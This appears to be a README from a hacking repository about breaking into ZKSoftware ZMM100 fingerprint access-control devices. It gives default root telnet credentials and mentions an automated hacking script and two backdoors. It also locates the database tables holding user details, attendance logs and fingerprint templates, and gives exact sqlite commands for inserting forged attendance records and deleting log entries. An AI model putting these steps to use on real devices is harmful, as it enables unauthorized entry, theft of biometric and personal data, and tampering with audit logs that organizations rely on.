Hacking Embedded Devices :
Hardware platform ZMM100 :
The fingerprint access control device Made by ZKSoftware.
-
- Default User/Password : root:solokey
- Protocol : Telnet (23).
Scripts :
- pwnit.py : Automated tool for hacking devices.
- hell : second backdoor.
- leak-data.sh : third backdoor.
YouTube Video :
Change root password :
passwd
{ enter new root password }
cp /etc/passwd /mnt/mtdblock
cp /etc/passwd /mnt/mtdblock/data/
More Info :
This directory "mnt/ramdisk" contains : picture.jpg , finger.bmp.
Web directory "/mnt/mtdblock/service/webserver" contains : some shitty csl web files lol.
Database here : "/mnt/mtdblock/data/ZKDB.db"
Important tables : "ATT_LOGS" ( user logs ) , "USER_INFO" ( user informations ) , "fptemplate10" ( finger print data ).
-- https://i.imgur.com/yNfVNSH.png ( ATT_LOGS ).
-- https://i.imgur.com/ujiIqzf.png ( USER_INFO ).
-- https://i.imgur.com/ilGwFZB.png ( fptemplate10 ).
> https://github.com/adrobinoga/zk-protocol/blob/master/sections/data-user.md#example-of-a-template-entry
SQLite ELF File : "/mnt/mtdblock/data/sqlite3_arm" --> ./sqlite3_arm ZKDB.db;
Insert / Delete DATA :
- Insert : ./sqlite3_arm ZKDB.db "INSERT INTO ATT_LOG VALUES (null,1224,15,'2019-04-12T00:00:00','0','0',null,null,null,null,0);"
- Delete log : ./sqlite3_arm ZKDB.db "DELETE FROM ATT_LOG WHERE ID = 1224;"
Shit its amazing 3:) !
References :
https://blog.infobytesec.com/2014/07/perverting-embedded-devices-zksoftware_2920.html https://github.com/linsir/pyscripts/tree/master/zkteco_check_in